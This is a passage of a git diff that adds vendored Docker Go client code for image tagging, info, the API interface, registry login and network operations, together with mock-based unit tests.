!strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", 
expectedURL, req.URL) + } + auth := req.Header.Get("X-Registry-Auth") + if auth == "NotValid" { + return &http.Response{ + StatusCode: http.StatusUnauthorized, + Body: ioutil.NopCloser(bytes.NewReader([]byte("Invalid credentials"))), + }, nil + } + if auth != "IAmValid" { + return nil, fmt.Errorf("Invalid auth header : expected 'IAmValid', got %s", auth) + } + query := req.URL.Query() + term := query.Get("term") + if term != "some-image" { + return nil, fmt.Errorf("term not set in URL query properly. Expected 'some-image', got %s", term) + } + content, err := json.Marshal([]registry.SearchResult{ + { + Name: "anything", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + privilegeFunc := func() (string, error) { + return "IAmValid", nil + } + results, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{ + RegistryAuth: "NotValid", + PrivilegeFunc: privilegeFunc, + }) + if err != nil { + t.Fatal(err) + } + if len(results) != 1 { + t.Fatalf("expected 1 result, got %v", results) + } +} + +func TestImageSearchWithoutErrors(t *testing.T) { + expectedURL := "/images/search" + filterArgs := filters.NewArgs() + filterArgs.Add("is-automated", "true") + filterArgs.Add("stars", "3") + + expectedFilters := `{"is-automated":{"true":true},"stars":{"3":true}}` + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + term := query.Get("term") + if term != "some-image" { + return nil, fmt.Errorf("term not set in URL query properly. Expected 'some-image', got %s", term) + } + filters := query.Get("filters") + if filters != expectedFilters { + return nil, fmt.Errorf("filters not set in URL query properly. 
Expected '%s', got %s", expectedFilters, filters) + } + content, err := json.Marshal([]registry.SearchResult{ + { + Name: "anything", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + results, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{ + Filters: filterArgs, + }) + if err != nil { + t.Fatal(err) + } + if len(results) != 1 { + t.Fatalf("expected a result, got %v", results) + } +} diff --git a/vendor/github.com/docker/docker/client/image_tag.go b/vendor/github.com/docker/docker/client/image_tag.go new file mode 100644 index 0000000000..bdbf94add2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_tag.go @@ -0,0 +1,34 @@ +package client + +import ( + "errors" + "fmt" + "net/url" + + "golang.org/x/net/context" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types/reference" +) + +// ImageTag tags an image in the docker host +func (cli *Client) ImageTag(ctx context.Context, imageID, ref string) error { + distributionRef, err := distreference.ParseNamed(ref) + if err != nil { + return fmt.Errorf("Error parsing reference: %q is not a valid repository/tag", ref) + } + + if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + return errors.New("refusing to create a tag with a digest reference") + } + + tag := reference.GetTagFromNamedRef(distributionRef) + + query := url.Values{} + query.Set("repo", distributionRef.Name()) + query.Set("tag", tag) + + resp, err := cli.post(ctx, "/images/"+imageID+"/tag", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/image_tag_test.go b/vendor/github.com/docker/docker/client/image_tag_test.go new file mode 100644 index 0000000000..7925db9f1b --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_tag_test.go @@ -0,0 
+1,121 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestImageTagError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ImageTag(context.Background(), "image_id", "repo:tag") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +// Note: this is not testing all the InvalidReference as it's the reponsability +// of distribution/reference package. +func TestImageTagInvalidReference(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ImageTag(context.Background(), "image_id", "aa/asdf$$^/aa") + if err == nil || err.Error() != `Error parsing reference: "aa/asdf$$^/aa" is not a valid repository/tag` { + t.Fatalf("expected ErrReferenceInvalidFormat, got %v", err) + } +} + +func TestImageTag(t *testing.T) { + expectedURL := "/images/image_id/tag" + tagCases := []struct { + reference string + expectedQueryParams map[string]string + }{ + { + reference: "repository:tag1", + expectedQueryParams: map[string]string{ + "repo": "repository", + "tag": "tag1", + }, + }, { + reference: "another_repository:latest", + expectedQueryParams: map[string]string{ + "repo": "another_repository", + "tag": "latest", + }, + }, { + reference: "another_repository", + expectedQueryParams: map[string]string{ + "repo": "another_repository", + "tag": "latest", + }, + }, { + reference: "test/another_repository", + expectedQueryParams: map[string]string{ + "repo": "test/another_repository", + "tag": "latest", + }, + }, { + reference: "test/another_repository:tag1", + expectedQueryParams: map[string]string{ + "repo": "test/another_repository", + "tag": "tag1", + }, + }, { + reference: "test/test/another_repository:tag1", + expectedQueryParams: 
map[string]string{ + "repo": "test/test/another_repository", + "tag": "tag1", + }, + }, { + reference: "test:5000/test/another_repository:tag1", + expectedQueryParams: map[string]string{ + "repo": "test:5000/test/another_repository", + "tag": "tag1", + }, + }, { + reference: "test:5000/test/another_repository", + expectedQueryParams: map[string]string{ + "repo": "test:5000/test/another_repository", + "tag": "latest", + }, + }, + } + for _, tagCase := range tagCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + query := req.URL.Query() + for key, expected := range tagCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + err := client.ImageTag(context.Background(), "image_id", tagCase.reference) + if err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/client/info.go b/vendor/github.com/docker/docker/client/info.go new file mode 100644 index 0000000000..ac07961224 --- /dev/null +++ b/vendor/github.com/docker/docker/client/info.go @@ -0,0 +1,26 @@ +package client + +import ( + "encoding/json" + "fmt" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// Info returns information about the docker server. 
+func (cli *Client) Info(ctx context.Context) (types.Info, error) { + var info types.Info + serverResp, err := cli.get(ctx, "/info", url.Values{}, nil) + if err != nil { + return info, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&info); err != nil { + return info, fmt.Errorf("Error reading remote info: %v", err) + } + + return info, nil +} diff --git a/vendor/github.com/docker/docker/client/info_test.go b/vendor/github.com/docker/docker/client/info_test.go new file mode 100644 index 0000000000..79f23c8af2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/info_test.go @@ -0,0 +1,76 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestInfoServerError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.Info(context.Background()) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestInfoInvalidResponseJSONError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("invalid json"))), + }, nil + }), + } + _, err := client.Info(context.Background()) + if err == nil || !strings.Contains(err.Error(), "invalid character") { + t.Fatalf("expected a 'invalid character' error, got %v", err) + } +} + +func TestInfo(t *testing.T) { + expectedURL := "/info" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + info := &types.Info{ + ID: "daemonID", + 
Containers: 3, + } + b, err := json.Marshal(info) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + info, err := client.Info(context.Background()) + if err != nil { + t.Fatal(err) + } + + if info.ID != "daemonID" { + t.Fatalf("expected daemonID, got %s", info.ID) + } + + if info.Containers != 3 { + t.Fatalf("expected 3 containers, got %d", info.Containers) + } +} diff --git a/vendor/github.com/docker/docker/client/interface.go b/vendor/github.com/docker/docker/client/interface.go new file mode 100644 index 0000000000..05978039b7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/interface.go @@ -0,0 +1,171 @@ +package client + +import ( + "io" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/api/types/swarm" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +// CommonAPIClient is the common methods between stable and experimental versions of APIClient. 
+type CommonAPIClient interface { + ContainerAPIClient + ImageAPIClient + NodeAPIClient + NetworkAPIClient + PluginAPIClient + ServiceAPIClient + SwarmAPIClient + SecretAPIClient + SystemAPIClient + VolumeAPIClient + ClientVersion() string + ServerVersion(ctx context.Context) (types.Version, error) + UpdateClientVersion(v string) +} + +// ContainerAPIClient defines API client methods for the containers +type ContainerAPIClient interface { + ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) + ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) + ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, containerName string) (container.ContainerCreateCreatedBody, error) + ContainerDiff(ctx context.Context, container string) ([]types.ContainerChange, error) + ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) + ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error) + ContainerExecInspect(ctx context.Context, execID string) (types.ContainerExecInspect, error) + ContainerExecResize(ctx context.Context, execID string, options types.ResizeOptions) error + ContainerExecStart(ctx context.Context, execID string, config types.ExecStartCheck) error + ContainerExport(ctx context.Context, container string) (io.ReadCloser, error) + ContainerInspect(ctx context.Context, container string) (types.ContainerJSON, error) + ContainerInspectWithRaw(ctx context.Context, container string, getSize bool) (types.ContainerJSON, []byte, error) + ContainerKill(ctx context.Context, container, signal string) error + ContainerList(ctx context.Context, options types.ContainerListOptions) ([]types.Container, error) + ContainerLogs(ctx context.Context, container 
string, options types.ContainerLogsOptions) (io.ReadCloser, error) + ContainerPause(ctx context.Context, container string) error + ContainerRemove(ctx context.Context, container string, options types.ContainerRemoveOptions) error + ContainerRename(ctx context.Context, container, newContainerName string) error + ContainerResize(ctx context.Context, container string, options types.ResizeOptions) error + ContainerRestart(ctx context.Context, container string, timeout *time.Duration) error + ContainerStatPath(ctx context.Context, container, path string) (types.ContainerPathStat, error) + ContainerStats(ctx context.Context, container string, stream bool) (types.ContainerStats, error) + ContainerStart(ctx context.Context, container string, options types.ContainerStartOptions) error + ContainerStop(ctx context.Context, container string, timeout *time.Duration) error + ContainerTop(ctx context.Context, container string, arguments []string) (types.ContainerProcessList, error) + ContainerUnpause(ctx context.Context, container string) error + ContainerUpdate(ctx context.Context, container string, updateConfig container.UpdateConfig) (container.ContainerUpdateOKBody, error) + ContainerWait(ctx context.Context, container string) (int64, error) + CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) + CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error + ContainersPrune(ctx context.Context, pruneFilters filters.Args) (types.ContainersPruneReport, error) +} + +// ImageAPIClient defines API client methods for the images +type ImageAPIClient interface { + ImageBuild(ctx context.Context, context io.Reader, options types.ImageBuildOptions) (types.ImageBuildResponse, error) + ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) + ImageHistory(ctx context.Context, image string) 
([]types.ImageHistory, error) + ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) + ImageInspectWithRaw(ctx context.Context, image string) (types.ImageInspect, []byte, error) + ImageList(ctx context.Context, options types.ImageListOptions) ([]types.ImageSummary, error) + ImageLoad(ctx context.Context, input io.Reader, quiet bool) (types.ImageLoadResponse, error) + ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) + ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) + ImageRemove(ctx context.Context, image string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) + ImageSearch(ctx context.Context, term string, options types.ImageSearchOptions) ([]registry.SearchResult, error) + ImageSave(ctx context.Context, images []string) (io.ReadCloser, error) + ImageTag(ctx context.Context, image, ref string) error + ImagesPrune(ctx context.Context, pruneFilter filters.Args) (types.ImagesPruneReport, error) +} + +// NetworkAPIClient defines API client methods for the networks +type NetworkAPIClient interface { + NetworkConnect(ctx context.Context, networkID, container string, config *network.EndpointSettings) error + NetworkCreate(ctx context.Context, name string, options types.NetworkCreate) (types.NetworkCreateResponse, error) + NetworkDisconnect(ctx context.Context, networkID, container string, force bool) error + NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) + NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) + NetworkList(ctx context.Context, options types.NetworkListOptions) ([]types.NetworkResource, error) + NetworkRemove(ctx context.Context, networkID string) error + NetworksPrune(ctx context.Context, pruneFilter filters.Args) (types.NetworksPruneReport, error) +} + +// NodeAPIClient defines 
API client methods for the nodes +type NodeAPIClient interface { + NodeInspectWithRaw(ctx context.Context, nodeID string) (swarm.Node, []byte, error) + NodeList(ctx context.Context, options types.NodeListOptions) ([]swarm.Node, error) + NodeRemove(ctx context.Context, nodeID string, options types.NodeRemoveOptions) error + NodeUpdate(ctx context.Context, nodeID string, version swarm.Version, node swarm.NodeSpec) error +} + +// PluginAPIClient defines API client methods for the plugins +type PluginAPIClient interface { + PluginList(ctx context.Context) (types.PluginsListResponse, error) + PluginRemove(ctx context.Context, name string, options types.PluginRemoveOptions) error + PluginEnable(ctx context.Context, name string, options types.PluginEnableOptions) error + PluginDisable(ctx context.Context, name string, options types.PluginDisableOptions) error + PluginInstall(ctx context.Context, name string, options types.PluginInstallOptions) (io.ReadCloser, error) + PluginUpgrade(ctx context.Context, name string, options types.PluginInstallOptions) (io.ReadCloser, error) + PluginPush(ctx context.Context, name string, registryAuth string) (io.ReadCloser, error) + PluginSet(ctx context.Context, name string, args []string) error + PluginInspectWithRaw(ctx context.Context, name string) (*types.Plugin, []byte, error) + PluginCreate(ctx context.Context, createContext io.Reader, options types.PluginCreateOptions) error +} + +// ServiceAPIClient defines API client methods for the services +type ServiceAPIClient interface { + ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) + ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) + ServiceList(ctx context.Context, options types.ServiceListOptions) ([]swarm.Service, error) + ServiceRemove(ctx context.Context, serviceID string) error + ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, 
service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) + ServiceLogs(ctx context.Context, serviceID string, options types.ContainerLogsOptions) (io.ReadCloser, error) + TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) + TaskList(ctx context.Context, options types.TaskListOptions) ([]swarm.Task, error) +} + +// SwarmAPIClient defines API client methods for the swarm +type SwarmAPIClient interface { + SwarmInit(ctx context.Context, req swarm.InitRequest) (string, error) + SwarmJoin(ctx context.Context, req swarm.JoinRequest) error + SwarmGetUnlockKey(ctx context.Context) (types.SwarmUnlockKeyResponse, error) + SwarmUnlock(ctx context.Context, req swarm.UnlockRequest) error + SwarmLeave(ctx context.Context, force bool) error + SwarmInspect(ctx context.Context) (swarm.Swarm, error) + SwarmUpdate(ctx context.Context, version swarm.Version, swarm swarm.Spec, flags swarm.UpdateFlags) error +} + +// SystemAPIClient defines API client methods for the system +type SystemAPIClient interface { + Events(ctx context.Context, options types.EventsOptions) (<-chan events.Message, <-chan error) + Info(ctx context.Context) (types.Info, error) + RegistryLogin(ctx context.Context, auth types.AuthConfig) (registry.AuthenticateOKBody, error) + DiskUsage(ctx context.Context) (types.DiskUsage, error) + Ping(ctx context.Context) (types.Ping, error) +} + +// VolumeAPIClient defines API client methods for the volumes +type VolumeAPIClient interface { + VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) + VolumeInspect(ctx context.Context, volumeID string) (types.Volume, error) + VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) + VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) + VolumeRemove(ctx context.Context, volumeID string, force bool) error + VolumesPrune(ctx context.Context, 
pruneFilter filters.Args) (types.VolumesPruneReport, error) +} + +// SecretAPIClient defines API client methods for secrets +type SecretAPIClient interface { + SecretList(ctx context.Context, options types.SecretListOptions) ([]swarm.Secret, error) + SecretCreate(ctx context.Context, secret swarm.SecretSpec) (types.SecretCreateResponse, error) + SecretRemove(ctx context.Context, id string) error + SecretInspectWithRaw(ctx context.Context, name string) (swarm.Secret, []byte, error) + SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error +} diff --git a/vendor/github.com/docker/docker/client/interface_experimental.go b/vendor/github.com/docker/docker/client/interface_experimental.go new file mode 100644 index 0000000000..51da98ecdd --- /dev/null +++ b/vendor/github.com/docker/docker/client/interface_experimental.go @@ -0,0 +1,17 @@ +package client + +import ( + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +type apiClientExperimental interface { + CheckpointAPIClient +} + +// CheckpointAPIClient defines API client methods for the checkpoints +type CheckpointAPIClient interface { + CheckpointCreate(ctx context.Context, container string, options types.CheckpointCreateOptions) error + CheckpointDelete(ctx context.Context, container string, options types.CheckpointDeleteOptions) error + CheckpointList(ctx context.Context, container string, options types.CheckpointListOptions) ([]types.Checkpoint, error) +} diff --git a/vendor/github.com/docker/docker/client/interface_stable.go b/vendor/github.com/docker/docker/client/interface_stable.go new file mode 100644 index 0000000000..cc90a3cbb9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/interface_stable.go @@ -0,0 +1,10 @@ +package client + +// APIClient is an interface that clients that talk with a docker server must implement. 
+type APIClient interface { + CommonAPIClient + apiClientExperimental +} + +// Ensure that Client always implements APIClient. +var _ APIClient = &Client{} diff --git a/vendor/github.com/docker/docker/client/login.go b/vendor/github.com/docker/docker/client/login.go new file mode 100644 index 0000000000..600dc7196f --- /dev/null +++ b/vendor/github.com/docker/docker/client/login.go @@ -0,0 +1,29 @@ +package client + +import ( + "encoding/json" + "net/http" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/registry" + "golang.org/x/net/context" +) + +// RegistryLogin authenticates the docker server with a given docker registry. +// It returns UnauthorizerError when the authentication fails. +func (cli *Client) RegistryLogin(ctx context.Context, auth types.AuthConfig) (registry.AuthenticateOKBody, error) { + resp, err := cli.post(ctx, "/auth", url.Values{}, auth, nil) + + if resp.statusCode == http.StatusUnauthorized { + return registry.AuthenticateOKBody{}, unauthorizedError{err} + } + if err != nil { + return registry.AuthenticateOKBody{}, err + } + + var response registry.AuthenticateOKBody + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/network_connect.go b/vendor/github.com/docker/docker/client/network_connect.go new file mode 100644 index 0000000000..c022c17b5b --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_connect.go @@ -0,0 +1,18 @@ +package client + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + "golang.org/x/net/context" +) + +// NetworkConnect connects a container to an existent network in the docker host. 
+func (cli *Client) NetworkConnect(ctx context.Context, networkID, containerID string, config *network.EndpointSettings) error { + nc := types.NetworkConnect{ + Container: containerID, + EndpointConfig: config, + } + resp, err := cli.post(ctx, "/networks/"+networkID+"/connect", nil, nc, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/network_connect_test.go b/vendor/github.com/docker/docker/client/network_connect_test.go new file mode 100644 index 0000000000..d472f4520c --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_connect_test.go @@ -0,0 +1,107 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" +) + +func TestNetworkConnectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NetworkConnect(context.Background(), "network_id", "container_id", nil) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkConnectEmptyNilEndpointSettings(t *testing.T) { + expectedURL := "/networks/network_id/connect" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + var connect types.NetworkConnect + if err := json.NewDecoder(req.Body).Decode(&connect); err != nil { + return nil, err + } + + if connect.Container != "container_id" { + return nil, fmt.Errorf("expected 'container_id', got %s", connect.Container) + } + + if connect.EndpointConfig != nil { + 
return nil, fmt.Errorf("expected connect.EndpointConfig to be nil, got %v", connect.EndpointConfig) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.NetworkConnect(context.Background(), "network_id", "container_id", nil) + if err != nil { + t.Fatal(err) + } +} + +func TestNetworkConnect(t *testing.T) { + expectedURL := "/networks/network_id/connect" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + var connect types.NetworkConnect + if err := json.NewDecoder(req.Body).Decode(&connect); err != nil { + return nil, err + } + + if connect.Container != "container_id" { + return nil, fmt.Errorf("expected 'container_id', got %s", connect.Container) + } + + if connect.EndpointConfig.NetworkID != "NetworkID" { + return nil, fmt.Errorf("expected 'NetworkID', got %s", connect.EndpointConfig.NetworkID) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.NetworkConnect(context.Background(), "network_id", "container_id", &network.EndpointSettings{ + NetworkID: "NetworkID", + }) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/network_create.go b/vendor/github.com/docker/docker/client/network_create.go new file mode 100644 index 0000000000..4067a541ff --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_create.go @@ -0,0 +1,25 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// NetworkCreate creates a new network in the docker host. 
+func (cli *Client) NetworkCreate(ctx context.Context, name string, options types.NetworkCreate) (types.NetworkCreateResponse, error) { + networkCreateRequest := types.NetworkCreateRequest{ + NetworkCreate: options, + Name: name, + } + var response types.NetworkCreateResponse + serverResp, err := cli.post(ctx, "/networks/create", nil, networkCreateRequest, nil) + if err != nil { + return response, err + } + + json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/network_create_test.go b/vendor/github.com/docker/docker/client/network_create_test.go new file mode 100644 index 0000000000..0e2457f89c --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_create_test.go @@ -0,0 +1,72 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestNetworkCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.NetworkCreate(context.Background(), "mynetwork", types.NetworkCreate{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkCreate(t *testing.T) { + expectedURL := "/networks/create" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + content, err := json.Marshal(types.NetworkCreateResponse{ + ID: "network_id", + Warning: "warning", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: 
http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + networkResponse, err := client.NetworkCreate(context.Background(), "mynetwork", types.NetworkCreate{ + CheckDuplicate: true, + Driver: "mydriver", + EnableIPv6: true, + Internal: true, + Options: map[string]string{ + "opt-key": "opt-value", + }, + }) + if err != nil { + t.Fatal(err) + } + if networkResponse.ID != "network_id" { + t.Fatalf("expected networkResponse.ID to be 'network_id', got %s", networkResponse.ID) + } + if networkResponse.Warning != "warning" { + t.Fatalf("expected networkResponse.Warning to be 'warning', got %s", networkResponse.Warning) + } +} diff --git a/vendor/github.com/docker/docker/client/network_disconnect.go b/vendor/github.com/docker/docker/client/network_disconnect.go new file mode 100644 index 0000000000..24b58e3c12 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_disconnect.go @@ -0,0 +1,14 @@ +package client + +import ( + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// NetworkDisconnect disconnects a container from an existent network in the docker host. 
+func (cli *Client) NetworkDisconnect(ctx context.Context, networkID, containerID string, force bool) error { + nd := types.NetworkDisconnect{Container: containerID, Force: force} + resp, err := cli.post(ctx, "/networks/"+networkID+"/disconnect", nil, nd, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/network_disconnect_test.go b/vendor/github.com/docker/docker/client/network_disconnect_test.go new file mode 100644 index 0000000000..b54a2b1ccf --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_disconnect_test.go @@ -0,0 +1,64 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestNetworkDisconnectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NetworkDisconnect(context.Background(), "network_id", "container_id", false) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkDisconnect(t *testing.T) { + expectedURL := "/networks/network_id/disconnect" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + var disconnect types.NetworkDisconnect + if err := json.NewDecoder(req.Body).Decode(&disconnect); err != nil { + return nil, err + } + + if disconnect.Container != "container_id" { + return nil, fmt.Errorf("expected 'container_id', got %s", disconnect.Container) + } + + if !disconnect.Force { + return nil, fmt.Errorf("expected Force to be true, got %v", disconnect.Force) + } + 
+ return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.NetworkDisconnect(context.Background(), "network_id", "container_id", true) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/network_inspect.go b/vendor/github.com/docker/docker/client/network_inspect.go new file mode 100644 index 0000000000..5ad4ea5bf3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_inspect.go @@ -0,0 +1,38 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// NetworkInspect returns the information for a specific network configured in the docker host. +func (cli *Client) NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) { + networkResource, _, err := cli.NetworkInspectWithRaw(ctx, networkID) + return networkResource, err +} + +// NetworkInspectWithRaw returns the information for a specific network configured in the docker host and its raw representation. 
